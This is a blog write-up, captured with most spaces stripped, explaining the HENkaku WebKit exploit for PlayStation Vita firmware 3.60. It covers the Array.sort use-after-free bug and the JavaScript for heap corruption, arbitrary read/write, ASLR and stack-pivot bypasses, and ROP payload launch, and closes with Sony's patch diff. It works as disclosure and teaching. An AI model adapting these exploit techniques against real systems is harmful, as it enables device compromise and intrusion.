8/20/2016

ExploitingWebKitonVita3.60

goback

ExploitingWebKitonVita3.60
Aug18,2016

Intro
ThisstartstheseriesofwriteupsforHENkakuexploitchain.IlltrynottospoiltheKOTH
challengetoomuchandonlywriteupthepartsthatarealreadyreverseengineered,clarifying
thedetailsthatotherpeoplemissed.However,inthecasethechallengebecomesstaleandno
progressismade,Illprobablypublishthewriteupanyway,sinceIalreadyhaveitwrittenand
itdbeawastetoletitrotinmyrepo.

ThePoC
OurtargetofchoiceforusermodecodeexecutionisWebKit.WebKithasaJavaScriptengine
whichhelpsalotwhenweneedtobypassASLR.WebbrowseronPSVitaalsodoesnot
requirePSNlogin,doesnotautoupdate,allowstoimplementaverysimpleexploitchain(visit
thissiteandpressthatbutton).Itsperfect.
Unlikeon3DS,whichhasnoASLRwhatsoever,VitaWebKithasanacceptableASLRwith
entropyof9bits,whichmakesbruteforceattacksextremelypainful(512reloadsonaverageto
triggertheexploit,thehorror!).Assuch,weneededabettervulnerabilitythanagenericuse
afterfree+vptroverwrite.
Thankstosomepeople,ImanagedtoobtainanicePoCscriptcrashingVitasbrowseronlatest
firmware.NotpresentanywhereonWebKitbugzilla/repo(maybeintherestrictedsection).
SowhatIstartedwithwasthisscript:
varalmost_oversize=0x3000;
varfoo=Array.prototype.constructor.apply(null,newArray(almost_oversize));
varo={};
o.toString=function(){foo.push(12345);return"";}
foo[0]=1;
foo[1]=0;
foo[2]=o;
foo.sort();

IfyourunitonaLinuxhostusingSonysWebKit,youwillseeasegmentationfault.Letslookat
itinadebugger:

https://blog.xyz.is/2016/webkit360.html

1/16

8/20/2016

ExploitingWebKitonVita3.60

Thread1"GtkLauncher"receivedsignalSIGSEGV,Segmentationfault.
0x00007ffff30bec35inJSC::WriteBarrierBase<JSC::Unknown>::set(this=0x7fff98ef8048,own
152
m_value=JSValue::encode(value);
(gdb)bt
#00x00007ffff30bec35inJSC::WriteBarrierBase<JSC::Unknown>::set(this=0x7fff98ef8048,
#10x00007ffff32cb9bfinJSC::ContiguousTypeAccessor<(unsignedchar)27>::setWithValue(
#20x00007ffff32c8809inJSC::JSArray::sortCompactedVector<(unsignedchar)27,JSC::Writ
at../../Source/JavaScriptCore/runtime/JSArray.cpp:1171
#30x00007ffff32c4933inJSC::JSArray::sort(this=0x7fff9911ff60,exec=0x7fff9d6e8078)
#40x00007ffff329c844inJSC::attemptFastSort(exec=0x7fff9d6e8078,thisObj=0x7fff9911f
at../../Source/JavaScriptCore/runtime/ArrayPrototype.cpp:623
#50x00007ffff329db4cinJSC::arrayProtoFuncSort(exec=0x7fff9d6e8078)at../../Source/
<therestdoesnotmatter>

Turnsout,ithitsunmappedmemorywhileexecutingJavaScriptArray.sortfunction.Butwhats
goingonhere?

Thebug
Letstakealookatthe JSArray::sort method
( Source/JavaScriptCore/runtime/JSArray.cpp ).Sinceourarrayisoftype
ArrayWithContiguous duetohowitwascreated:
Array.prototype.constructor.apply(null,newArray(almost_oversize)); ,wegetinto

the sortCompactedVector function.Heresitsfullimplementation:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

template<IndexingTypeindexingType,typenameStorageType>
voidJSArray::sortCompactedVector(ExecState*exec,ContiguousData<StorageType>
{
if(!relevantLength)
return;

VM&vm=exec>vm();

//ConvertingJavaScriptvaluestostringscanbeexpensive,sowedoitonceup
//Thisisaconsiderableimprovementoverdoingittwicepercomparison,though
//buffer.Besides,thisprotectsusfromcrashingifsomeobjectshavecustomt
//randomorotherwisechangingresults,effectivelymakingcomparefunctioninc

Vector<ValueStringPair,0,UnsafeVectorOverflow>values(relevantLength);
if(!values.begin()){
throwOutOfMemoryError(exec);
return;
}

Heap::heap(this)>pushTempSortVector(&values);

https://blog.xyz.is/2016/webkit360.html

2/16

8/20/2016

21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

ExploitingWebKitonVita3.60

boolisSortingPrimitiveValues=true;

for(size_ti=0;i<relevantLength;i++){
JSValuevalue=ContiguousTypeAccessor<indexingType>::getAsValue(data,
ASSERT(indexingType!=ArrayWithInt32||value.isInt32());
ASSERT(!value.isUndefined());
values[i].first=value;
if(indexingType!=ArrayWithDouble&&indexingType!=ArrayWithInt32)
isSortingPrimitiveValues=isSortingPrimitiveValues&&value.isPrimitive
}

//FIXME:ThefollowingloopcontinuestocalltoStringonsubsequentvalueseve
//atoStringcallraisesanexception.

for(size_ti=0;i<relevantLength;i++)
values[i].second=values[i].first.toWTFStringInline(exec);

if(exec>hadException()){
Heap::heap(this)>popTempSortVector(&values);
return;
}

//FIXME:Sincewesortbystringvalue,afastalgorithmmightbetousearadi
//thanO(NlogN).

#ifHAVE(MERGESORT)
if(isSortingPrimitiveValues)
qsort(values.begin(),values.size(),sizeof(ValueStringPair),compareByStrin
else
mergesort(values.begin(),values.size(),sizeof(ValueStringPair),compareByS
#else
//FIXME:Theqsortlibraryfunctionislikelytonotbeastablesort.
//ECMAScript262doesnotspecifyastablesort,butinpractice,browsersperf
qsort(values.begin(),values.size(),sizeof(ValueStringPair),compareByStringPai
#endif

//IfthetoStringfunctionchangedthelengthofthearrayorvectorstorage,
//increasethelengthtohandletheorignalnumberofactualvalues.
switch(indexingType){
caseArrayWithInt32:
caseArrayWithDouble:
caseArrayWithContiguous:
ensureLength(vm,relevantLength);
break;

caseArrayWithArrayStorage:

https://blog.xyz.is/2016/webkit360.html

3/16

8/20/2016

68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84

ExploitingWebKitonVita3.60

if(arrayStorage()>vectorLength()<relevantLength){
increaseVectorLength(exec>vm(),relevantLength);
ContiguousTypeAccessor<indexingType>::replaceDataReference(&data,
}
if(arrayStorage()>length()<relevantLength)
arrayStorage()>setLength(relevantLength);
break;

default:
CRASH();
}
for(size_ti=0;i<relevantLength;i++)
ContiguousTypeAccessor<indexingType>::setWithValue(vm,this,data,i,

Heap::heap(this)>popTempSortVector(&values);
}

ThisfunctiontakesthevaluesfromtheJSarray,putsthemintoatemporaryvector,sortsthe
vector,andthenputsthevaluesbackintotheJSarray.
Online37ina for loop,foreveryelementits toString methodiscalled.Whenitscalled
forourobject o ,whathappensnextis:
function(){

foo.push(12345);

return"";
}

Anintegerispushedintothearraythatisbeingsorted.Thiscausesthearrayelementstoget
reallocated.Online81,thesortedelementsarewrittenbackintothearray,however,the data
pointerisneverupdatedwiththenewreallocatedvalue.

metadata

Toillustrateit:

metadata

foo

foo+12345

data

Greyareahereisfree/unallocatedmemory.OnLinuxitactuallyisunmappedafterreallocis
called.Meanwhile,the data stillpointstotheoldmemorylocation.Asaresult,theweb
browsergetsasegmentationfaulttryingtowritetounmappedmemory.
https://blog.xyz.is/2016/webkit360.html

4/16

8/20/2016

ExploitingWebKitonVita3.60

OutofboundsRW
Dependingonthecontents, JSArray objectsmightbestoreddifferentlyinmemory.However,
onesweareoperatingon,arestoredcontinuouslyasmetadataheader(inyellow)plusarray
contents(ingreen).
Thecontentsarejustavectorof JSValue structures.
unionEncodedValueDescriptor{
int64_tasInt64;
doubleasDouble;
struct{
int32_tpayload;
int32_ttag;
}asBits;
};

Themetadataheaderstorestwointerestingfields:

uint32_tm_publicLength;//Themeaningofthisfielddependsonthearraytype,butfor
uint32_tm_vectorLength;//Thelengthoftheindexedpropertystorage.Theactualsize

Ourgoalnowistooverwritebothofthemandextendthearraybeyondofwhatisactually
allocated.
Toachievethat,letsmodifythe o.toString method:
varnormal_length=0x800;
varfu=newArray(normal_length);
vararrays=newArray(0x100);
o.toString=function(){

foo.push(12345);

for(vari=0;i<arrays.length;++i){

varbar=Array.prototype.constructor.apply(null,fu);

bar[0]=0;

bar[1]=1;

bar[2]=2;

arrays[i]=bar;

return"";
}

Ifwegetlucky,hereswhathappens:

https://blog.xyz.is/2016/webkit360.html

5/16

ExploitingWebKitonVita3.60

bar

bar

metadata

bar

metadata

foo

metadata

metadata

metadata

8/20/2016

foo+12345

data

Inthisexample(thatdoesntreflectactuallarraysize),whenthesortedvaluesarewrittenback
usingthe data pointer,metadataheadersofbothsecondandthird bar getoverwritten.
Whatdoweoverwritethemwith?Remember,thatthegreenareaisthevectorof JSValue
objects.Every JSValue objectis8bytes.Butifwefill foo with,forexample, 0x80000000 ,
weonlycontrol4bytes,andtherestisusedupforthe tag .Whatsa tag ?
enum{Int32Tag=0xffffffff};
enum{BooleanTag=0xfffffffe};
enum{NullTag=0xfffffffd};
enum{UndefinedTag=0xfffffffc};
enum{CellTag=0xfffffffb};
enum{EmptyValueTag=0xfffffffa};
enum{DeletedValueTag=0xfffffff9};
enum{LowestTag=DeletedValueTag};

ItshowWebKitJavaScriptCorepacksdifferenttypesintoasingle JSValue structure:itcanbe

anint,aboolean,acell(pointertoanobject),null,undefined,oradouble.Soifwewrite
54321 ,weonlycontrolhalfofthestructure,andtheotherhalfissetto Int32Tag or
0xffffffff .
However,wecanalsowrite double values,like 54321.0 .Thiswaywecontrolall8bytesof
thestructure,butthereareotherlimitations(Somefloatingpointnormalizationcrapdoesnot
allowfortrulyarbitraryvaluestobewritten.Otherwise,youwouldbeabletocrafta CellTag
andsetpointertoanarbitraryvalue,thatwouldbehorrible.Interestingly,beforeitdidallowthat,
whichiswhattheveryfirstVitaWebKitexploitused!CVE20101807).
Soletswrite double valuesinstead.
foo[0]=o;
varlen=u2d(0x80000000,0x80000000);
for(vari=1;i<0x2000;++i)

foo[i]=len;
foo.sort();
u2d / d2u aresmallhelperstoconvertbetweenapairof int anda double :

https://blog.xyz.is/2016/webkit360.html

6/16

8/20/2016

ExploitingWebKitonVita3.60

var_dview=null;
//u2d/d2utakenfromPSA20130903
//wrapstwouint32sintodoubleprecision
functionu2d(low,hi)
{

if(!_dview)_dview=newDataView(newArrayBuffer(16));

_dview.setUint32(0,hi);

_dview.setUint32(4,low);

return_dview.getFloat64(0);
}
functiond2u(d)
{

if(!_dview)_dview=newDataView(newArrayBuffer(16));

_dview.setFloat64(0,d);

return{low:_dview.getUint32(4),

hi:_dview.getUint32(0)};
}

Assuch,ifwenowlookat arrays wewillfindafew JSArray objectsthatareextended

beyondtheirrealboundaryandhavetheirlengthsetto 0x80000000 .
Interestingly,thissuccessfullycorruptsaJSArrayobjectonVitabutcrashesonLinuxhittinga
guardpage.ButthisdoesntmatterbecausewereexploitingVita,notLinux.
Nowwhenwewritetooneofcorrupted bar objects,wecanachieveanoutofbounds
read/writewhichisawesome!ButletsupgradeittoatrulyarbitraryRW.
AnastutereadermightnoticenowthatsinceVitaisa32bitconsoleandwesetlengthto
0x80000000 andevery JSValue is8bytes,wealreadyinfacthavearbitraryRW.However,
wearestillwritingtooffsetsfromtheoriginal bar vectorbase,andhaventleakedanyheap
addressesyet.Inaddition,wecanonlywrite double values,whichissuperinconvenient.

ArbitraryRW
Toobtainarbitraryread/write,Iusedthesametrickasusedbythe2.003.20WebKitexploit,
describedhere.
Spraybuffers:
buffers=newArray(spray_size);
buffer_len=0x1344;
for(vari=0;i<buffers.length;++i)

buffers[i]=newUint32Array(buffer_len/4);

Find Uint32Array bufferinmemory.Startsearchingatsomearbitraryoffsetbeforethe

corruptedbuffers(called arr here)elements.

https://blog.xyz.is/2016/webkit360.html

7/16

8/20/2016

ExploitingWebKitonVita3.60

varstart=0x200000000x11000;
for(;;start){

if(arr[start]!=0){

_dview.setFloat64(0,arr[start]);

if(_dview.getUint32(0)==buffer_len/4){//FoundUint32Array

_dview.setUint32(0,0xEFFFFFE0);

arr[start]=_dview.getFloat64(0);//changebuffersize

_dview.setFloat64(0,arr[start2]);
heap_addr=_dview.getUint32(4);//leaksomeheapaddress
_dview.setUint32(4,0)
_dview.setUint32(0,0x80000000);
arr[start2]=_dview.getFloat64(0);//changebufferoffset
break;

Findcorrupted Uint32Array :
corrupted=null;
for(vari=0;i<buffers.length;++i){

if(buffers[i].byteLength!=buffer_len){

corrupted=buffers[i];

break;

}
}
varu32=corrupted;

NowthatwehavetrulyarbitraryRW,andwehaveleakedsomeheapaddress,whatsnextis:

Codeexecution
Again,theoldtrickwith textarea objectsisusedhere(whyinventnewthings?)First,modify
theoriginal Uint32Array heapspraytointerleave textarea objects:
spray_size=0x4000;
textareas=newArray(spray_size);
buffers=newArray(spray_size);
buffer_len=0x1344;
textarea_cookie=0x66656463;
textarea_cookie2=0x55555555;
for(vari=0;i<buffers.length;++i){

buffers[i]=newUint32Array(buffer_len/4);

vare=document.createElement("textarea");
https://blog.xyz.is/2016/webkit360.html

8/16

8/20/2016

ExploitingWebKitonVita3.60

e.rows=textarea_cookie;
textareas[i]=e;

Usingcorrupted Uint32Array object,finda textarea inmemory:

varsome_space=heap_addr;
search_start=heap_addr;
for(varaddr=search_start/4;addr<search_start/4+0x4000;++addr){

if(u32[addr]==textarea_cookie){

u32[addr]=textarea_cookie2;

textarea_addr=addr*4;

break;

}
}
/*

ChangetherowsoftheElementobjectthenscanthearrayof

sprayedobjectstofindanobjectwhoserowshavebeenchanged
*/
varfound_corrupted=false;
varcorrupted_textarea;
for(vari=0;i<textareas.length;++i){

if(textareas[i].rows==textarea_cookie2){

corrupted_textarea=textareas[i];

break;

}
}

Nowwehavetwoviewsintothesame textarea :wecanmodifyitdirectlyinmemoryusing

our u32 object,andwecancallitsfunctionsfromJavaScript.Sotheideaistooverwritethe
vptrusingviaourmemoryaccessandthencallthemodifiedfunctiontableviaJavaScript.

Mitigation1:ASLR
RememberthatVitahasASLR,whichiswhywehadtocomplicatetheexploitsomuch.But
witharbitraryRWwecanjustleak textarea vptranddefeatASLRcompletely:
functionread_mov_r12(addr){

first=u32[addr/4];

second=u32[addr/4+1];

return((((first&0xFFF)|((first&0xF0000)>>4))&0xFFFF)|((((second
}
varvtidx=textarea_addr0x70;
vartextareavptr=u32[vtidx/4];
https://blog.xyz.is/2016/webkit360.html

9/16

8/20/2016

ExploitingWebKitonVita3.60

SceWebKit_base=textareavptr0xabb65c;
SceLibc_base=read_mov_r12(SceWebKit_base+0x85F504)0xfa49;
SceLibKernel_base=read_mov_r12(SceWebKit_base+0x85F464)0x9031;
ScePsp2Compat_base=read_mov_r12(SceWebKit_base+0x85D2E4)0x22d65;
SceWebFiltering_base=read_mov_r12(ScePsp2Compat_base+0x2c688c)0x9e5;
SceLibHttp_base=read_mov_r12(SceWebFiltering_base+0x3bc4)0xdc2d;
SceNet_base=read_mov_r12(SceWebKit_base+0x85F414)0x23ED;
SceNetCtl_base=read_mov_r12(SceLibHttp_base+0x18BF4)0xD59;
SceAppMgr_base=read_mov_r12(SceNetCtl_base+0x9AB8)0x49CD;

Letstalkabitaboutcodeexecution.OnVitatheresnoJITanditsimpossibletoallocateRWX
memory(OnlyallowedfromthePlayStationMobileapp).Sowehavetowritethewholepayload
inROP.
Theoldexploitsusedsomethingcalled JSoS whichisdescribedhere.However,herethe
browserbecomesreallyunstableaftercorruptingthe JSArray object,sowewanttorunas
littleJavaScriptaspossible.
Asaresult,anewversionofroptoolwaswrittenbyDaveewhichsupportedASLR.Thebasic
ideahereisthatsomewords(awordis4bytes)inroptooloutputnowhaverelocation
informationassignedtothem.Afterrelocatingthepayload,whichisjustaddingdifferentbases
( SceWebKit_base / SceLibc_base /etc)tothesewords,wecanlaunchtheresultingROPchain
normally.

Mitigation2:Stackpivotprotection
Sinceunknownfirmwareversion,thereisnowanadditionalmitigationimplemented:sometimes
thekernelwillcheckthatyourthreadstackpointerisinfactinsideitsstack.Ifthisisnotthe
case,thewholeapplicationgetskilled.
Tobypassthis,weneedtoplantourROPchainintothethreadstack.Andtodothat,weneed
toknowthreadstackvirtualaddress.AndwedontknowitbecauseASLR.
However,wehavearbitraryRW.Theresatonofwaystoleakthestackpointer.Iusedthe
setjmp function.
Hereshowwecallit:
//copyvtable
for(vari=0;i<0x40;i++)

u32[some_space/4+i]=u32[textareavptr/4+i];
u32[vtidx/4]=some_space;
//backupourobj
for(vari=0;i<0x30;++i)

backup[i]=u32[vtidx/4+i];
https://blog.xyz.is/2016/webkit360.html

10/16

8/20/2016

ExploitingWebKitonVita3.60

//callsetjmpandleakstackbase
u32[some_space/4+0x4e]=SceLibc_base+0x14070|1;//setjmp
corrupted_textarea.scrollLeft=0;//callsetjmp

Nowour corrupted_textarea isoverwritteninmemorywith jmp_buf ,whichsomewhere

containsthestackpointer.Later,werestoretheoriginalcontentsasfollows.Thisisdoneso
thatJavaScriptdoesnotcrashthebrowserwhenweattempttodoanythingwiththecorrupted
textarea object:
//restoreourobj
for(vari=0;i<0x30;++i)

u32[vtidx/4+i]=backup[i];

Unfortunately,ifwelookatthe setjmp implementationin SceLibc ,wegethitwithyet

anotherexploitmitigation:

ROM:81114070setjmp
ROM:81114070PUSH{R0,LR}
ROM:81114072BLsub_81103DF2//Returnshighqualityrandom
ROM:81114076POP{R1,R2}
ROM:81114078MOVLR,R2
ROM:8111407AMOVR3,SP
ROM:8111407CSTMIA.WR1!,{R4R11}
ROM:81114080EORSR2,R0//LRisXOR'edwithacookie
ROM:81114082EORSR0,R3//SPisXOR'edwiththesamecookie
ROM:81114084STMIAR1!,{R0,R2}
ROM:81114086VSTMIAR1!,{D8D15}
ROM:8111408AVMRSR2,FPSCR
ROM:8111408ESTMIAR1!,{R2}
ROM:81114090MOV.WR0,#0
ROM:81114094BXLR

Sobasically:
stored_LR=LR^cookie
stored_SP=SP^cookie

Canyouseewherethisisgoing?Wealreadyknow SceWebKit_base ,soweknowthetrue

valueof LR .Usingthemagicofdiscretealgebra:
cookie=stored_LR^LR
SP=stored_SP^cookie
SP=stored_SP^(stored_LR^LR)

Or,inJavaScript:
https://blog.xyz.is/2016/webkit360.html

11/16

8/20/2016

ExploitingWebKitonVita3.60

sp=(u32[vtidx/4+8]^((u32[vtidx/4+9]^(SceWebKit_base+0x317929))>>>0))
sp=0xef818;//adjusttogetSPbase

NowwecanwriteourROPpayloadintothethreadstackandpivottoitwithouttheapplication
beingkilled!

Finally,CodeExecution
First,werelocatetheROPpayload.Remember,howwehavethepayloadandrelocs.Ifyou
lookatpayload.js,thisiswhatyouwillsee:
payload=[2119192402,65537,0,0,1912//anditgoeson...
relocs=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,//...

Everynumberfromthe relocs arrayindicatedhowa payload membershouldberelocated.

Forexample,0meansnorelocation,1isadd rop_data_base ,2isadd SceWebKit_base ,3is
add SceLibKernel_base andsoon.
(AroptoolgeneratedROPchainhastwosections:codeanddata.codeisjusttheROPstack.
dataisstufflikestringsorbuffers. rop_data_base isvaddrofdata. rop_code_base isvaddr
ofcode)
Thenextlooprelocatesthepayloadstraightintothethreadstack:
//relocatethepayload
rop_data_base=sp+0x40;
rop_code_base=sp+0x10000;

addr=sp/4;
//Sincerelocsareappliedtothewholeropbinary,notjustcode/datasections,werep
//thisbehaviorhere.However,wesplititintodatasection(placedatthetopofthe
//andcodesection(placedatstack+somebigoffset)
for(vari=0;i<payload.length;++i,++addr){

if(i==rop_header_and_data_size)

addr=rop_code_base/4;

switch(relocs[i]){
case0:

u32[addr]=payload[i];

break
case1:

u32[addr]=payload[i]+rop_data_base;

break;
/*

skippedmostrelocs
*/
default:

https://blog.xyz.is/2016/webkit360.html

12/16

8/20/2016

ExploitingWebKitonVita3.60

alert("wtf?");
alert(i+""+relocs[i]);

Inthisloop,wesplitthepayloadintotwoparts:codeanddatasections.Wedontwantcodeto
touchdatabecauseiftheyareclose,andcodeisafterdata(whichisthecaseforroptool
generatedROPchains),whenafunctioniscalled,itmightdamageapartofthedatasection
(rememberwhichdirectionthestackgrowsin,andwhichdirectiontheROPchaingoes).
Sooncewearedonerelocatingthedatasection: if(i==rop_header_and_data_size) ,we
switchtorelocatingthecodesection: addr=rop_code_base/4 .
header

header

data

data

code

code

OntheleftishowtheROPchainlookslikewhileitsstoredinthe payload array.Ontheright

ishowtheROPchainiswrittenintothestack.
Finally,letstriggertheROPchain:
//54c8:e891a916ldmr1,{r1,r2,r4,r8,fp,sp,pc}
u32[some_space/4+0x4e]=SceWebKit_base+0x54c8;
varldm_data=some_space+0x100;
u32[ldm_data/4+5]=rop_code_base;//sp
u32[ldm_data/4+6]=SceWebKit_base+0xc048a|1;//pc=pop{pc}
//Thisalert()isusedtodistinguishbetweenthewebkitexploitfail
//andsecondstageexploitfail
//Ifyoudon'tseeit,thewebkitexploitfailed
//Ifyouseeitandthenthebrowsercrashes,thesecondstagefailed
alert("WelcometoHENkaku!");
corrupted_textarea.scrollLeft=ldm_data;//triggerropchain,r1=arg

https://blog.xyz.is/2016/webkit360.html

13/16

8/20/2016

ExploitingWebKitonVita3.60

//Youwon'tseethisalert()unlesssomethingwentterriblywrong
alert("that'sit");

When corrupted_textarea.scrollLeft=ldm_data isdone,ourLDMgadgetwillgetcalled,

duetooverwrittenvtable. R1 willbe ldm_data ,soitwillload SP=rop_code_base and PC
=pop{pc} fromthisbufferandassuchwillkickstarttheROPchain.

Bonus:HowSonypatchedit
SonyregularlyuploadsnewsourcecodeoftheirWebKit,asrequestedbyLGPL,tothispage.
(Unlesstheydonot,inwhichcasetheymightrequireafriendlypokeoveremail).
Diffingthesourcecodebetween3.60and3.61revealsthefollowing(Uselessstuffomitted):

diffr360/webkit_537_73/Source/JavaScriptCore/runtime/JSArray.cpp361/webkit_537_73/So
1087,1096c1087,1123
}
};

template<IndexingTypeindexingType,typenameStorageType>
voidJSArray::sortCompactedVector(ExecState*exec,ContiguousData<StorageType>data,u
{
if(!relevantLength)
return;

+}
+};
+
+template<>
+ContiguousJSValuesJSArray::storage<ArrayWithInt32,WriteBarrier<Unknown>>()
+{
+returnm_butterfly>contiguousInt32();
+}
+
+template<>
+ContiguousDoublesJSArray::storage<ArrayWithDouble,double>()
+{
+returnm_butterfly>contiguousDouble();
+}
+
+template<>
+ContiguousJSValuesJSArray::storage<ArrayWithContiguous,WriteBarrier<Unknown>>()
+{
+returnm_butterfly>contiguous();
+}
+
https://blog.xyz.is/2016/webkit360.html

14/16

8/20/2016

ExploitingWebKitonVita3.60

+template<>
+ContiguousJSValuesJSArray::storage<ArrayWithArrayStorage,WriteBarrier<Unknown>>()
+{
+ArrayStorage*storage=m_butterfly>arrayStorage();
+ASSERT(!storage>m_sparseMap);
+returnstorage>vector();
+}
+
+template<IndexingTypeindexingType,typenameStorageType>
+voidJSArray::sortCompactedVector(ExecState*exec,ContiguousData<StorageType>data,u
+{
+data=storage<indexingType,StorageType>();
+
+if(!relevantLength)
+return;
+
1167,1172c1194,1200
CRASH();
}

for(size_ti=0;i<relevantLength;i++)
ContiguousTypeAccessor<indexingType>::setWithValue(vm,this,data,i,values[i

+CRASH();
+}
+
+data=storage<indexingType,StorageType>();
+for(size_ti=0;i<relevantLength;i++)
+ContiguousTypeAccessor<indexingType>::setWithValue(vm,this,data,i,values[i
+

Theynowupdatethe data pointerbeforewritingvaluesintoit.Soevenafterthearraygets

reallocated,itsstillwritingtopropermemory.Thisiswhatcausesthe alert("restartthe
browser") errorifyouattempttorunHENkakuon3.61.Goodjob,Sony.

Conclusion
Thatsitfortoday!IhopeyouenjoyedthiswriteupasmuchasIhatedwritingtheexploit.Later,
inafewmonths/years/centuries,Illbringyousomemorenicewriteups,solookforwardtoit.
SinceIwrotemostoftheHENkakuexploitchain,ImbannedfromparticipatingintheKOTH
challenge:(,butatleastyougettoenjoythewriteups:).

6Comments

https://blog.xyz.is/2016/webkit360.html

15/16

8/20/2016

ExploitingWebKitonVita3.60

TypeCommentHere(atleast3chars)

Name(optional)

Email(optional)

Website(optional)

Submit

Anonymous 15hoursago

ThiswriteupisfantasticandIfeellikeI'velearnedalotinreadingit.Thanksfortaking
thetimetodothis.
2

Reply

Ayu 13hoursago

Dittohere.Itsinterestingtoseehowthesekindofthingshappen.
2

Reply

m6mb3rtx 10hoursago

Greatarticle!
LookingforwardtoreadthenextpartoftheHENkakuseries(nicenameXD),doesitendwhen
yougetr00taccess?
"Goodjob,Sony."LOL
|

Reply

Wololo 5hoursago

Thanksforthewriteup,superappreciated
|

Reply

Casavult 4hoursago

Amazingread.Thanksforthiswriteup!
|

Reply

MilegGai 3hoursago

IlikedreadingthiseventhoughIhavenoideawhat'sgoingon.
|

Reply

SubscribeviaRSS|GitHub

https://blog.xyz.is/2016/webkit360.html

16/16